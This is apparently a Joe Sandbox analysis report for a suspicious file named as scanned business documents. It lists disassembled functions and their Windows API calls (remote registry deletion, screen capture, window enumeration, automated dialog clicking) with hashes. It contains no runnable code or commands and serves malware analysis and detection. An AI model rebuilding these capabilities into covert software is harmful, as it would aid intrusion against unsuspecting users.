                                                      • Opcode Fuzzy Hash: 4a187bea2ea3fac36b6f87e2d5ce8812d27cc165af5eaec11d739721eef47d22
                                                      • Instruction Fuzzy Hash: D4412775640208AFDB129FA5CC88EEA7BBDEF8EB11F148458F905E7260DB309D41CB64
                                                      Function 002F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 002F1502
                                                      • VariantCopy.OLEAUT32(?,?), ref: 002F150B
                                                      • VariantClear.OLEAUT32(?), ref: 002F1517
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002F15FB
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 002F1657
                                                      • VariantInit.OLEAUT32(?), ref: 002F1708
                                                      • SysFreeString.OLEAUT32(?), ref: 002F178C
                                                      • VariantClear.OLEAUT32(?), ref: 002F17D8
                                                      • VariantClear.OLEAUT32(?), ref: 002F17E7
                                                      • VariantInit.OLEAUT32(00000000), ref: 002F1823
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 1234038744-3931177956
                                                      • Opcode ID: 2d687d2aa701cff50afe9feadd62f3f83d5d096ca7ce39a1ae46ca158fbeb280
                                                      • Instruction ID: f0db4b024f10b5211e1e6d6762d49c6ea8f19924ac3e516a35ffc686638f786e
                                                      • Opcode Fuzzy Hash: 2d687d2aa701cff50afe9feadd62f3f83d5d096ca7ce39a1ae46ca158fbeb280
                                                      • Instruction Fuzzy Hash: 15D10272A20219DBDF04AF65D885BB9F7B6BF45740F908066E606AB180DB70DC70DBA1
                                                      Function 0030B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030B6F4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030B772
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0030B80A
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030B87E
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030B89C
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0030B8F2
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030B904
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0030B922
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0030B983
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030B994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 8bf6703b6e67670c5482f4c90fad638221468dcab12895c52458113710dcce6b
                                                      • Instruction ID: a2af746a56f7b8a63df841cef5016873723821f7a4d9047da41eb3e82ca06543
                                                      • Opcode Fuzzy Hash: 8bf6703b6e67670c5482f4c90fad638221468dcab12895c52458113710dcce6b
                                                      • Instruction Fuzzy Hash: 98C18A3421A241AFD711DF14C4A4F2AFBE5BF88308F15859CE59A8B6E2CB71EC45CB91
                                                      Function 0030255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 003025D8
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003025E8
                                                      • CreateCompatibleDC.GDI32(?), ref: 003025F4
                                                      • SelectObject.GDI32(00000000,?), ref: 00302601
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0030266D
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003026AC
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003026D0
                                                      • SelectObject.GDI32(?,?), ref: 003026D8
                                                      • DeleteObject.GDI32(?), ref: 003026E1
                                                      • DeleteDC.GDI32(?), ref: 003026E8
                                                      • ReleaseDC.USER32(00000000,?), ref: 003026F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 2193f8aafde72a9eaf01b79fb9d33fb195c04568d97acb8af41229979399455f
                                                      • Instruction ID: 52f8144706616fbc94be7a4ba30620fb766a87d3233e15d7f9e8ed9b7f0c0cb3
                                                      • Opcode Fuzzy Hash: 2193f8aafde72a9eaf01b79fb9d33fb195c04568d97acb8af41229979399455f
                                                      • Instruction Fuzzy Hash: 2E610275D01219EFCF05CFA8D888AAEBBBAFF4C310F208529E955A7250D771A951CF50
                                                      Function 002BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 002BDAA1
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD659
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD66B
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD67D
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD68F
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6A1
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6B3
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6C5
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6D7
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6E9
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD6FB
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD70D
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD71F
                                                        • Part of subcall function 002BD63C: _free.LIBCMT ref: 002BD731
                                                      • _free.LIBCMT ref: 002BDA96
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BDAB8
                                                      • _free.LIBCMT ref: 002BDACD
                                                      • _free.LIBCMT ref: 002BDAD8
                                                      • _free.LIBCMT ref: 002BDAFA
                                                      • _free.LIBCMT ref: 002BDB0D
                                                      • _free.LIBCMT ref: 002BDB1B
                                                      • _free.LIBCMT ref: 002BDB26
                                                      • _free.LIBCMT ref: 002BDB5E
                                                      • _free.LIBCMT ref: 002BDB65
                                                      • _free.LIBCMT ref: 002BDB82
                                                      • _free.LIBCMT ref: 002BDB9A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 6685aef5ba5e608b8e3f0ff5ed4832ea8c42108f818842f3e40821c634c524e1
                                                      • Instruction ID: cf1c3918e7bdc14e30fb3febe51e1ff8c561f7eda301fb82c2d12e55418b20c4
                                                      • Opcode Fuzzy Hash: 6685aef5ba5e608b8e3f0ff5ed4832ea8c42108f818842f3e40821c634c524e1
                                                      • Instruction Fuzzy Hash: 79316D31664706EFEB21AE38E845BD6B7E8FF00390F255819E458D7191EF31AC648B20
                                                      Function 002E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E369C
                                                      • _wcslen.LIBCMT ref: 002E36A7
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002E3797
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E380C
                                                      • GetDlgCtrlID.USER32(?), ref: 002E385D
                                                      • GetWindowRect.USER32(?,?), ref: 002E3882
                                                      • GetParent.USER32(?), ref: 002E38A0
                                                      • ScreenToClient.USER32(00000000), ref: 002E38A7
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E3921
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E395D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 4010501982-679674701
                                                      • Opcode ID: ac1256f0fb32b28e1c817a168634f8df374fe1155d84c679f0becb9152ad31de
                                                      • Instruction ID: d6865511f3ca727b31bfdb624541afbc6e7d5ea9707b30d33ff45bd5e5e0135a
                                                      • Opcode Fuzzy Hash: ac1256f0fb32b28e1c817a168634f8df374fe1155d84c679f0becb9152ad31de
                                                      • Instruction Fuzzy Hash: 3B91D471260247AFD705DF26C889BEAF7A8FF44311F808519F999C3191DB30EA65CB91
                                                      Function 002E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E4994
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E49DA
                                                      • _wcslen.LIBCMT ref: 002E49EB
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 002E49F7
                                                      • _wcsstr.LIBVCRUNTIME ref: 002E4A2C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 002E4A64
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 002E4A9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 002E4AE6
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 002E4B20
                                                      • GetWindowRect.USER32(?,?), ref: 002E4B8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
                                                      • Opcode ID: a7a75a542bcc843af7ff9468423360421cee6b9d420b4dfb86210aed7e6df64d
                                                      • Instruction ID: 2b8f9a063b5dfecd4ee7662747406b8f851e56405457b9723f47dbda51f8926a
                                                      • Opcode Fuzzy Hash: a7a75a542bcc843af7ff9468423360421cee6b9d420b4dfb86210aed7e6df64d
                                                      • Instruction Fuzzy Hash: 6D91E0314A42469FDB04EF12C884FAA77E8FF84314F44846EFD859A196DB30ED65CBA1
                                                      Function 0030CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030CC64
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0030CC8D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030CD48
                                                        • Part of subcall function 0030CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0030CCAA
                                                        • Part of subcall function 0030CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0030CCBD
                                                        • Part of subcall function 0030CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030CCCF
                                                        • Part of subcall function 0030CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030CD05
                                                        • Part of subcall function 0030CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030CD28
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0030CCF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2734957052-4033151799
                                                      • Opcode ID: 2fa054b267e13bdcd04bf5c4c7a127b7938bf8daac7e1589cbfbd000be627a2c
                                                      • Instruction ID: 51ddaf6a14a49151c71a5ae9fa1232b0c8aaa289b073436e46afcb178f19c31a
                                                      • Opcode Fuzzy Hash: 2fa054b267e13bdcd04bf5c4c7a127b7938bf8daac7e1589cbfbd000be627a2c
                                                      • Instruction Fuzzy Hash: 08319071952128BBDB22CB50DC98EFFBB7CEF09740F015265F906E2290DB309E45DAA0
                                                      Function 002EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 002EE6B4
                                                        • Part of subcall function 0029E551: timeGetTime.WINMM(?,?,002EE6D4), ref: 0029E555
                                                      • Sleep.KERNEL32(0000000A), ref: 002EE6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 002EE705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002EE727
                                                      • SetActiveWindow.USER32 ref: 002EE746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002EE754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 002EE773
                                                      • Sleep.KERNEL32(000000FA), ref: 002EE77E
                                                      • IsWindow.USER32 ref: 002EE78A
                                                      • EndDialog.USER32(00000000), ref: 002EE79B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 584dbbbde59071ba6746ab46046ac45f173feb896288be6189668e804a22757e
                                                      • Instruction ID: 7212864c92fec5f9eddbb575738cdcec0bcd5bc2b191cfc914de52ed64b205ab
                                                      • Opcode Fuzzy Hash: 584dbbbde59071ba6746ab46046ac45f173feb896288be6189668e804a22757e
                                                      • Instruction Fuzzy Hash: 9C21A8B02E0385AFEF035F22EC89B667B6DF75A34AF555424F445821B1DBB1AC108B15
                                                      Function 002EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002EEA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002EEA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002EEA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002EEA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002EEAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 7eaaf318880b2152ffe8ec473fb2aa1b3696e25021a075a3e6e1008adb5b68d1
                                                      • Instruction ID: d3240dd9188cff15ae01e5b3e6c1a01c68f22b547957773612272adcae3de58f
                                                      • Opcode Fuzzy Hash: 7eaaf318880b2152ffe8ec473fb2aa1b3696e25021a075a3e6e1008adb5b68d1
                                                      • Instruction Fuzzy Hash: 4C1154356A125A79DB21FB62DC4ADFF6ABCEBD2B00F400429F401A60D1EBB01955CAB1
                                                      Function 00298BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5
                                                      • DestroyWindow.USER32(?), ref: 00298C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 002D6973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 002D69A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 002D69B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00298BBA,00000000), ref: 002D69D4
                                                      • DeleteObject.GDI32(00000000), ref: 002D69E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
                                                      • Instruction ID: fabaf3d7121b4c04699baefee7d2108ab81cb37ef3620873e341cf87e5d68f23
                                                      • Opcode Fuzzy Hash: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
                                                      • Instruction Fuzzy Hash: 6C617D31522701DFCF2A9F24D958B6577F5FB46312F18951AE0829BAB0CB71ADA0CF90
                                                      Function 00299838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952
                                                      • GetSysColor.USER32(0000000F), ref: 00299862
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: b61ef155b1c091cf5bab5130eefc750fb50fa6aa117ad3e84fbf37b6a7f6523a
                                                      • Instruction ID: 87b3c26b75626baffd79436f31a92bd0c8097de9b1eec06ec80e6ffe884e0183
                                                      • Opcode Fuzzy Hash: b61ef155b1c091cf5bab5130eefc750fb50fa6aa117ad3e84fbf37b6a7f6523a
                                                      • Instruction Fuzzy Hash: 1641B031164640AFDF215F3C9C88BB93BA9BB0A330F14861DF9A2872E1E7319C91DB11
                                                      Function 002E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,002CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 002E9717
                                                      • LoadStringW.USER32(00000000,?,002CF7F8,00000001), ref: 002E9720
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,002CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 002E9742
                                                      • LoadStringW.USER32(00000000,?,002CF7F8,00000001), ref: 002E9745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 002E9866
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
